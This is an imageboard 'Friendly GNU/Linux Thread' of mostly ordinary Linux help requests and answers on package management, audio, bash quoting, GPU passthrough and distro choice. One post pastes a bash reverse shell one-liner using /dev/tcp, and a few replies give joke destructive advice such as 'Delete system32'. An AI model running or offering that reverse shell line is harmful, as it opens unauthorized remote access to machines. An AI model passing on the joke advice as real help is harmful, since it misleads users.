/fglt/ - Friendly GNU/Linux Thread

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Users of all levels are welcome to ask questions about GNU/Linux and share their experiences.

*** Please be civil, notice the "Friendly" in every Friendly GNU/Linux Thread ***

Before asking for help, please check our list of resources.

If you would like to try out GNU/Linux you can do one of the following:
0) Install a GNU/Linux distribution of your choice in a Virtual Machine.
1) Use a live image and to boot directly into the GNU/Linux distribution without installing anything.
2) Dual boot the GNU/Linux distribution of your choice along with Windows or macOS.
3) Go balls deep and replace everything with GNU/Linux.

Resources: Your friendly search engine, mailing lists...
>b-but what search engines respect my privacy and freedom of speech?
Try qwant, searx, ixquick or startpage.
>b-but what e-mail providers respect my privacy and freedom of speech?
Try autistici or aktivix.

$ man %command%
$ info %command%
$ help %command%
$ %command% -h
$ %command% --help

Don't know what to look for?
$ apropos %something%

Check the Wikis (most troubleshoots work for all distros):

Sup Forums's Wiki on GNU/Linux: wiki.installgentoo.com/index.php/Category:GNU/Linux

>What distro should I choose?
>What are some cool programs?
>What are some cool terminal commands?
>Where can I learn the command line?
>Where can I learn more about Free Software?
>How to break out of the botnet?

/t/'s GNU/Linux Games: /fglt/'s website and copypasta collection:
fglt.nl && p.teknik.io/wJ9Zy

Other urls found in this thread:



:: Starting full system upgrade...
there is nothing to do

:( now what?

>redcore not there
shit wiki

Go outside

how do i break arch?
seriously, i keep hearing how it's unstable and breaks all the time so i wanna break it

add unsupported repositories and use yaourt for all your package management

can someone walk me through what exactly this does? this works where netcat did not.
bash -i >& /dev/tcp/ 0>&1

Successfully running Arch with Xfce.

Gotta configure Xfce now, not liking the default at all.

Is this a question?

there's nothing wrong with blogging

How do I apply keymap to XFCE?

Do you mean keyboard layout? setxkbmap, or maybe it is setxkbdmap.
Do you want to set up your hotkeys? Use either xbindkeys or sxhkd
That is assuming you are in an xorg session. If in a tty you could use localectl to set the keyboard layout

installed gnome with arch, wanna remove it, can't remove it. what do?

-Rsc as far as I recall. It will break a shitload of other things as well though. Make sure you still have a dhcp client installed before runnign that, as the command may remove it.

Guys, probably a silly question to ask, i live in Frogland (Paris) and looking to move into web-dev. From my research, Linux isn't used anywhere in France, it seems to be soley Windows usage.

Is it worth learning the GNU/Linux OS if i don't live in the USA? Would they even be available/supported here since the majority of them are US based companies?

yeah that works but removes LITERALLY everything. Why does everything depend on GNOME like that?

pacman -Rdds gnome

ﹱ ፈ﹵ቸከ$ደ ﹵ፐ

How much longer is gtk2 going to get supported?

it seems that worked well

Thanks, this worked well the second time.

Finally. Getting the latest Vagrant and VBox straight from a package manager.

>the effort of installing Arch wasn't for nothing

Pretty sure there are a few Debian developers from French universities.
Also not sure how geography is relevant, unless you are looking for a Linux it job. Noone supports consumer Linux.

Trying to get manjaro to work on a spectre x360, but I'm running into a bit of a road block. When I boot off the USB GRUB enters unknown file system mode. I tried getting it to boot with ubuntu and everything runs normally. I've tried xfce, gnome, and kde just to see if anything will work and nothing seems to change. Anyone got some solution to this that doesn't involve tons of modification?

I have a few python scripts im trying to run.
When i execute them they return illegal hardware instruction (core dumped)
And dmesg returns
python[24460] trap invalid opcode ip:7fb4d67981ad sp:7ffd16de66c0 error:0 in dlib.cpython-36m-x86_64-linux-gnu.so[7fb4d6309000+5c5000]

It is only these certain scripts, other scripts work fine.
What could cause this?

what program are you trying, and what is your system architecture?

apt-get autoremove messed up my audio in debian
should i install pulseaudio? it has alsa installed

>to XFCE?
You open the xfce keyboard configuration program and set it.


Delete system32

I have no idea what XFCE is or does sorry.

It comes broken ootb.

>I have no idea what XFCE is or does sorry.
GNOME devs pls go and stay go

Linux doesn't have desktop market share worth mentioning outside Southeast Asia shithole countries. You should learn Linux well enough to set up apache with PHP and mariadb if you want to claim to be a full stack developer. Apache and nginx appear to host the vast majority of domains in France[1], and like 95% of that is going to be Linux because nobody pays for a Windows license on an Apache server.
[1] secure1.securityspace.com/s_survey/data/201801/fr/index.html

GNU/Linux*. Linux is just the kernel.

the audio works locally but firefox has no sound. it says to download pulseaudio but whats wrong with alsa?

Unless you compile out pulseaudio in the mozconfig when you build it, you have to use pulseaudio for audio in firefox.
Your options are to compile it out and enable alsa or use pulseaudio, or use apulse

Thanks a lot user but I started to add things with alsa's name on it so I did add apulse but it doesn't work. I even rebooted but nothing... Installing Pulseaudio then

>illegal instruction

you will have to recompile the program and make sure it isn't compiled for a cpu arch that yours isnt compatible with

It is a python script, there is nothing to compile.
I know project the arch is x86_64.

surely it makes calls to compiled code

It references other python scripts, but there are no binaries in the repo

Should i end my life right now?


linux mint, noticed my laptp freezes every once in a while i dont know if its the cpu update that i did or maybe sylvia is to hight tech for y laptop

>linux mint
found your problem

my gnome nautilus crashes when I try to add a samba drive. I can mount the drive correctly using -o rw,vers=1.0. If I try to launch nautilus via terminal and causing the crash, sometime a segmentation fault is reported. what should I do? I can correctly mount other smb drives in nautilus but not the smb drive managed by my router

meta packages or groups?



if something leaves the group, it won't be removed?
dunno if the same is true for meta

so how do i fix my problem ?


why would xdg-open use audacious for directories when xdg-mime says my file manager should be used?

Could you please advice some easy, customizable and well documented status bar for i3? I've tried polybar, but it seems I am too brainlet to understand it. Can't even paste in Font Awesome icons and get the volume controls working. Please help.

I'm running Kubuntu 17.10 that I've dual booted with windows 10. Set up all the partitions myself for the first time too. I have an SSD with all my main Linux files and now I'm trying to set up an HDD as a storage drive for random stuff like Steam vidya.

I've already mounted the drive to my knowledge but I can't seem to create any new files on the HDD, the, "create new," option is simply faded out and unclickable. Had I fucked up, forgot a step? What should I be looking for?

Also, there's a random folder labeled, "lost+found" that's locked and reappears in my root and HDD directory. Whenever I try to open it the message, "Could not enter folder /lost+found," pops up. Should I be concerned?

Apparently the entire mimetype system breaks if a default inode/directory application is set in ~/.config/mimeapps.list.

Why are computers so fucking awful?

Check ownership of the drive, do you have write permissions?

local filename="$1";
echo "$@" > "~/.reminders/$filename";

>addreminder test some words
>bash: ~/.reminders/test: No such file or directory
Am I retarded? Why doesn't this work? The > is supposed to write to the file, why is it saying the file I want to create doesn't exist?

does ~/.reminders exist?
using ">" won't create parent directories
use something like "if [ ! -e ~/.reminders ]; mkdir -p ~/.reminders; fi" (if not exists ; make and any parents)

Yeah, it exists. I just tried replacing ~ with the absolute path and it works. I guess it's not expanding ~ or something.

Yeah, just writing echo "some words" > "~/.reminders/test" fails, tab automatically expands ~/ to /home/user. Weird.

oh wait
you put ~ in quotes, can't do that, it won't be expanded by the shell

Ah, I see. Thank you!

You guys may know, sorry if its a "google it" type of question, i have an acer laptop and an asus laptop, both running mint 18.3. If i just physically swap the hdds around, am i likely to have issues? Thanks in advance

You need to disable fast boot in Windows
Power & Sleep Settings > Additional power settings > Choose what the power buttons do > untick fast startup

Does anyone know how to prevent MPV from smoothing out an image when upscaling?

This video for example
is pixel art, and when I view it at fullscreen on youtube it still keeps the sharp corners around each pixel, but if viewing it through MPV and view at fullscreen it all gets blurred out and looks ugly.

>search glmg in catalog
>get this thread because of the filename


why tf is qbittorrent so laggy? it also ruins the kde desktop & i have to ctrl alt backspace to get out & re login. it wasn't like this at all when i was using windows & i had the same amount of torrents

Hmm, it still doesn't look quite right. I wonder what youtube is doing that makes it look so good

Maybe. Depends on how different their hardware is. You'll most likely to have problem with WIFI

what should I install in my live operating system
gnome based pls no qt bullshit

How do I quit VIM????


I have no idea what "qt bullshit" is or does, sorry.

why the fuck do 95% of itros come with screen tearing out of the box? im using an intel cpu with integrated graphics, this is a fucking joke , just installed Debian 9 with lxde on my thinkpad, ubuntu is the only distro without screen tearing, this shit just makes me rage

Oh shit, it's the format. I thought things like mpv and youtube-dl automatically fetch the highest quality, but in this case it looks like it's grabbing a low quality version.
I thought the video was just naturally low resolution and youtube somehow scaled it up to preserve the pixelation.

You're in vim forever now.
Better get used to it. Start by addressing the irrationality of your desire to leave vim in the first place - do you *really* have a good reason to quit vim? Shouldn't you instead just figure out how to do what you want to do from vim from now on? These are the question you must seek answer to, "how do I quit vim" is just the wrong question.

What are /fglt/'s favorite systemd-less distros? I think I've finally settled on Slackware.

Debian with systemd ripped out also seemed to work reasonably well.

Why do people ask such questions on forums and such, when they can just put the same exact phrase into search engine and get the answer immediately?

>no systemd
I imagine that one day people with gasoline cars will have to go out of their way to fill up while everyone else just swaps out their batteries on the go

Gentoo and I have high hopes for GuixSD if I ever get around to trying it.

Is the battery cars supposed to represent OpenRC?

>Is the battery cars supposed to represent OpenRC?
No. From the critics of systemd: "There is also concern that it forms a system of interlocked dependencies, thereby giving distribution maintainers little choice but to adopt systemd as more user-space software come to depend on its components."
Imagine your gas stations being replaced by battery stations-- your new interlocked dependencies :)

Either learn systemd now or go out of your way to "fill up"

Learning systemd is not the issue - from a sysadmin standpoint it is fantastic. Not revolutionary, but makes life easier.
I don't want it on any of my machines, though. It may be a step forward in one direction but is at least 2 back in others.
Software does not always progress linearly in terms of quality or usefulness.

Fair enough. I've been fortunate enough to not have learned inits until systemd circa 2012. My only excuse is that I have no reason to bother with any legacy init. My complaint is changes in systemd may break system beacuse I rely on so many features.

I am having some trouble with passing through my second GPU, thought I'd create a forum post for help, but didn't get any help yet.

downloading my first linux distro right now to play around with, "debian 9.3 amd64 stable" any advice from Sup Forums? is this a good beginner distro, I hear alot of people shit on gnome which i read is the default for debian should i switch it? what should i download first on a fresh install. any advice,pointers or tips is appreciated.

Here is how I usually deck out a fresh Linux install. Just do everything you might need on a daily basis, like try to browse your favorite websites, consume some of your local media, spin up a VM,... Just see where you hit snags, like needing flash, or video codecs, or a hypervisor. And follow the Debian wiki/forum to resolve your issues. Ypy should be up and running pretty fast if you know how to read. I don't like suggesting program's since you should be free to choose what you prefer. Try out some, its fun and easy with apt.

my mkinitcpiois
MODULES=(vfio vfio_iommu_type1 vfio_pci vfio_virqfd)
and my kernel command line has the following
amd_iommu=on vfio-pci.ids=1002:67df,1002:aaf0 video=efifb:off kvm_amd.avic=1 nomodeset default_hugepagesz=1G hugepages=24 transparent_hugepage=never

I don't bother with the scripts and shit they have. just associate it with the kernel at boot

Can't associate with PCI.ids, since I have 2 identical cards.

nvm, realized you have the same card x2. that sounds more difficult and I haven't done that. I made sure to buy different cards.

Use VMWare Workstation Player to audition new distros and only boot natively when you find one you think you can work with.

Debian stable is very well curated but usually too out of date to be a good desktop as-is. You can apt pin packages from testing/unstable and try to manage the ensuing dependency shuffle, but you could just as easily start with Xubuntu where that isn't as much a problem and make peace with the idea that not every single file in /usr/bin is going to have a corresponding man page.

i see this complaint often (sorry im new) what do you mean by out of date? will the operating system not function properly unless its updated very often? i didnt think it being out of date would be such a huge problem. would love an explanation thanks for your above suggestions and tips.

You won't have the latest new features or bugfixes.Debian however outdated is a highly stable OS due to their use of older, but more stable packages.
Say you want Firefox. Using the built in package manager you can download Firefox. It might be a version or 2 behind, but you won't notice this in normal operation. You'll be fine.

How do I load XFCE panels from config from command line? Is there any panel that would allow me to load it configurations from command line, except polybar, which doesn't have open windows buttons and which system tray is worst implementation possible? I want to alternate between XP-like and Unity-like panel whenever I turn my tablet screen.

What is the best distro to:

>not have systemd
>run wayland (sway)
>run steam

Thanks in advance.

Friendly heads up: MATE 1.20 now has full HiDPI support! This means that all the applications have been ported to Gtk3 and Wayland becomes possible in the future! I'm going to try a fresh install of Arch+MATE on my old rMBP, since OSX, GNOME 3, and KDE 5 all make it a bit too slow.

Linux hardware support tends to lag behind the mainstream by a couple years, and the Debian process adds a couple more to that. So if you have hardware